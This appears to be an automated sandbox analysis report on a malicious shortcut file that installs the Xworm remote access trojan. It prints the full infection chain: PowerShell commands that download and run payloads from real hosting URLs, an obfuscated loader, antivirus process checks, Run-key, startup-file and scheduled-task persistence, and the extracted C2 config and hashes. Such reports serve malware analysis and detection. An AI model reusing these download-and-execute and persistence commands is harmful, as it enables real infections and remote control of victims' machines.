Resubmissions
29/03/2024, 07:30
240329-jbvgaadb27 10Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
29/03/2024, 07:30
General
-
Target
package80171530600.jpg.lnk
-
Size
3KB
-
MD5
120d412876efbaa28dff4a9714571867
-
SHA1
c5c771c0176928fae424c88bd3b0be0a795cf83c
-
SHA256
92d270232d6564ce573fab75253976abeca7be39d25e1b82cc9bf902e259d53e
-
SHA512
9780d623da5cfb56f5abed4f18d30c4b0110d30bd5b2f1d00e81ce6cdac1d7ed833fa64ebd2ae301c8466d90bbae08cf16c33a647ee5416521e1a3f5ac7e9d17
Malware Config
Extracted
https://www.drivehq.com/file/DFPublishFile.aspx/FileID11135552760/Keyek8fjxdsrd6u/egg.png
Extracted
xworm
5.0
0vyG14tDobaS6ejo
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/Dh8E7H3R
Signatures
-
Detect Xworm Payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 32 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 61 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\package80171530600.jpg.lnk2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -command "$url='https://www.drivehq.com/file/DFPublishFile.aspx/FileID11135552760/Keyek8fjxdsrd6u/egg.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\egg.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\egg.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\egg.hta'){Start-Process 'C:\Users\Public\egg.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\egg.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "$url='https://www.drivehq.com/file/DFPublishFile.aspx/FileID11135552760/Keyek8fjxdsrd6u/egg.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\egg.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\egg.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\egg.hta'){Start-Process 'C:\Users\Public\egg.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\egg.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\egg.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EEmMDtwpl($bz, $uo){[IO.File]::WriteAllBytes($bz, $uo)};function ppqoKFuXB($bz){if($bz.EndsWith((NCvJs @(59994,60048,60056,60056))) -eq $True){Start-Process (NCvJs @(60062,60065,60058,60048,60056,60056,59999,59998,59994,60049,60068,60049)) $bz}else{Start-Process $bz}};function LzwJLe($bz, $rwUEO){[Microsoft.Win32.Registry]::SetValue((NCvJs @(60020,60023,60017,60037,60043,60015,60033,60030,60030,60017,60026,60032,60043,60033,60031,60017,60030,60040,60031,60059,60050,60064,60067,60045,60062,60049,60040,60025,60053,60047,60062,60059,60063,60059,60050,60064,60040,60035,60053,60058,60048,60059,60067,60063,60040,60015,60065,60062,60062,60049,60058,60064,60034,60049,60062,60063,60053,60059,60058,60040,60030,60065,60058)), $rwUEO, $bz)};function dPzglTlqY($ir){$C = New-Object (NCvJs @(60026,60049,60064,59994,60035,60049,60046,60015,60056,60053,60049,60058,60064));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$uo = $C.DownloadData($ir);return $uo};function NCvJs($UP){$wb=59948;$s=$Null;foreach($fs in $UP){$s+=[char]($fs-$wb)};return $s};function CjiEZ(){$APRFPFrU = $env:APPDATA + '\';$YDiYUJWk = dPzglTlqY (NCvJs @(60052,60064,60064,60060,60063,60006,59995,59995,60046,60053,60064,60046,60065,60047,60055,60049,60064,59994,60059,60062,60051,59995,60054,60065,60058,60055,60053,60049,60001,60000,59995,60067,60049,60046,60057,60045,60058,59995,60048,60059,60067,60058,60056,60059,60045,60048,60063,59995,60017,60051,60051,60063,60016,60049,60062,60053,60066,60049,60048,59994,60049,60068,60049));$xsNUlTb = $APRFPFrU + 'EggsDerived.exe';EEmMDtwpl $xsNUlTb $YDiYUJWk;ppqoKFuXB $xsNUlTb;$rwUEO = 'RIYvNq';LzwJLe $xsNUlTb $rwUEO;;;;}CjiEZ;6⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EggsDerived.exe"C:\Users\Admin\AppData\Roaming\EggsDerived.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"9⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"9⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 199639⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 19963\Telecom.pif9⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Stream + Keyboard 19963\R9⤵
-
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\19963\Telecom.pif19963\Telecom.pif 19963\R9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.19⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM msedge.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM cmd.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\Admin\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit2⤵
- Drops startup file
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\19963\RegAsm.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\19963\RegAsm.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
472KB
MD5a8384a3f77cf55416bf3c996deb5e11c
SHA1fb77d6b37d48394b75c0b2e18345e6358bc500c6
SHA256dbab0bdd3b8589b95b3839fb64a1c277c62bf0777faa03dde69aa883f2e3bfa1
SHA51263f78b82d75427ad05a9844512310daaa7fbc90a5e389c1eb6ed9e659065ee3930477b34aca68c3b1d198d47ec847f913a68b6e0e680a8d02278adaf8c683e99
-
Filesize
63KB
MD50d5df43af2916f47d00c1573797c1a13
SHA1230ab5559e806574d26b4c20847c368ed55483b0
SHA256c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
108KB
MD5d766f32452ab37f9d3f7442b79d3c7aa
SHA1a64451c419b835c894c4ccbaec1f3b677ffb2865
SHA256d746aab00da0d7a6642b750b8e74ecbb6e06a697a86c12c2e53d5402b2cb4f76
SHA512bda8b83d5ca2ab979286d7eb5179a5f2f998855af08e09f9732813c935429c8404accf8eaa16b087d087314fad5f2caf5067c14e6ef61b699f71a4c89fc32ac4
-
Filesize
113KB
MD5d42d5b6c62fc16537f9e02f6878a726b
SHA1558d6606042464216a725cdd4ffa5fbee3f89754
SHA2566da998806af8d45879b783b961b647df7fe5b37cc182eff6756da0ca6079c4ab
SHA512d5c843be29f1a0d5f1a5da701d98b6623d628a419d4a26854871e400e91ceebcec0fd8da48116f9942aa8a41390405b5f10c9f7b447049bb9085c36ade8cff61
-
Filesize
16KB
MD5374d1802b678505470af77cc3fc02dfc
SHA144a6e2ea73de59223d6a52c0d2447afd2951ba3d
SHA25641e793cfb1b80f7fbf67dc2f2c00fd64dd37eb149f9c096c53a9024ca8be7636
SHA512f2b07757d20526188a112b6599da04fdaf7d0cc18eb1db9e12c81711537e5324b5dc617f96d4d92e51d6c0e1c274677b3f2e294a00f5d7aa74bbfe5aa01a7e5d
-
Filesize
66KB
MD549141fa1580ff171c93aad4eb541ddab
SHA1e7d96f4358600e4afc85460733df06c7598c81b4
SHA256a6f110caeb2c931bad058bca3780dd4bcd4144ab16dea37553a859caa528b63e
SHA512806d7ce5d8888ad7b55c45220e92837e69902fc483d08c12d5d899398986a88df9663dea79d3f18e355cb8ebe239affba015b5c9f33d1ee9e08e501f7d26efa7
-
Filesize
84KB
MD50cec2e416a4658bb57e658d166ba8a96
SHA1c746a3070de12ef164e8622c74d0a0857ab7cf4e
SHA25692a2b4a8a9044997c5c3a11a1fdaf1a446aba5248bf02d125d9ba8c1f3f06c4c
SHA5126257914987a32213ea7abce7ae7fc042e1c2ab7009dd7206ba7b8b22ffe13d22b0ba233c668ad97999ff3f4ebf988cd9c8b1c66088107bb40285f01dc1f61fee
-
Filesize
190KB
MD5b7f27a133e90ae9a58e2559c9caf9759
SHA139b6e7de5c6dc0252f9a05b308bf079e21e4872d
SHA2563e0d772faa0819c04b8e5c97b4fd02a78015b3b1d69af0159f875e37f60bbb00
SHA5126e696b4ac26eeaf56637ef52653f85ab7283bb2c7b87924a86ec2c180d9903aaa9b1f2a8b986477a7b25c545afd918841e335223f76b70e66e7d43dcefff6ba9
-
Filesize
238KB
MD50fe23aaa844275cc69153c1c530f056a
SHA16e7fd65663cfa44ba68c8367a1c415e999cb8371
SHA25619942d356ec90f076d6eda272030d4c341877fd7df58fb7ff4c804bddbf01d99
SHA512e163b670fa69e5e540d0b9904d72f11f6f21b3f72d757d4cf96edf6d8bc8d4e47dbb61a1483aae979fec31f41ff55d4e5a017ffe7b22e857787bd96f397be1d3
-
Filesize
267KB
MD51f22516db88c817a0a2690ae44d0d5a1
SHA1941957208145b05374152eebceb4b1e27ac567b6
SHA256d8b1ce1a6dd67094e5a6b1c2b48115d561e7e012079be031b48f1791a2acbe12
SHA512b46a51743dcc7e52bc00cbeef2034d6568c93b09bcdf7bb86298bbeaa0a2fc4c9d4d5838eb545f263fc15d09a578ad9b57cb853d93667cadf8c51e8ae36a686a
-
Filesize
4KB
MD53cbf1d6d00412611d1c10072a5608ae7
SHA1368a8a3592cc335aba9e99e8c4bb716f5228df49
SHA256181c602909f69f5524318810ad257eeb3f8831e34f826e5dabf3a797da1fffed
SHA51239fdb41cd9034f53f1a4e0863d8ad0c3aabb8f0b0f91b49dd51987da6a71bf171302409c1f118fceb7285aaaf816c977b8f432d616a5f05a8763142a5f352817
-
Filesize
282KB
MD5545e573943b2d77f96aaf83a4c90468d
SHA1ca20a8ff17c84969b352adfb2911c9c365c731dc
SHA25666dbd0bd2ac4ae854ac15b01ef61265093da7e4534dd630a5955d8879b155bc7
SHA512700d03b06cda42b07f97c238ec8e7c1cabda1aec1c85cbfb8d0145f67fd3da9d0e4f11ff8c6aeaf24806600e9016366c4566c29ce05d2325802a045be90c3f8c
-
Filesize
45KB
MD5cb0cf96099e0cd964ccc2003ce264d93
SHA12d15db969842a6b196336fb1baf6ca38be482a59
SHA256520481555dd6940947dd602f3db5a162ba0f7d8cb201c01eb4124fdf70645d88
SHA512ade03ecbbdfc1f99d5e364b2a2b5933a243709b1f73f3aaa77e5634115b32fd262026902cab965b39438e7080e33eacdc45f8d8101ab95981a6e97a6f5b67b7b
-
Filesize
1KB
MD51bdb07c530480f1263fc35e751f4b225
SHA1b24d82c594c22a7422cd3ec5deec51b3294693cc
SHA2562e25757772a519ffa04073a20724f5dad1e2e59831b522ecfb30c32bd1ac6863
SHA512d455df909bc4918f12f31c2d7ff95b7edf9b565681ce9589dcb49b60b5ac2fee0516fc4745da4d2f144163d4d25499fc60b9fb1bb8706e81bfac62d4b8bc8977
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10.0MB
MD563b3dd980ac9a06fd167b0df8121c979
SHA1eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
SHA25644d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
SHA5128baabed3323abdbc172f4fe3fa107e12ff6296d0f86efa85ae76258a83a8102e6c50697478a0571692262dc7c24b56f6de8866e474a7d731ef0e559add018ea4
-
Filesize
50KB
MD559a4d867137719f2247edc8ea56ca0f3
SHA16298597d4c20ec711c496f19e6b318e9c3fc0132
SHA256db6b4c44783770e8f95081a8b3d31e9c49bca5579e015c00202d6ca2564e9b0a
SHA512dfe4ca47fe12e5f790539768a99e1256614988d84f1b895cabf4466efefe2e2256a05e8e83d9b9bb29fbda2601fc78412f0542c8ba30b7ded75588558c5f28f3
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
1.1MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
624KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
600KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
216KB
-
Filesize
64KB
-
Filesize
7.7MB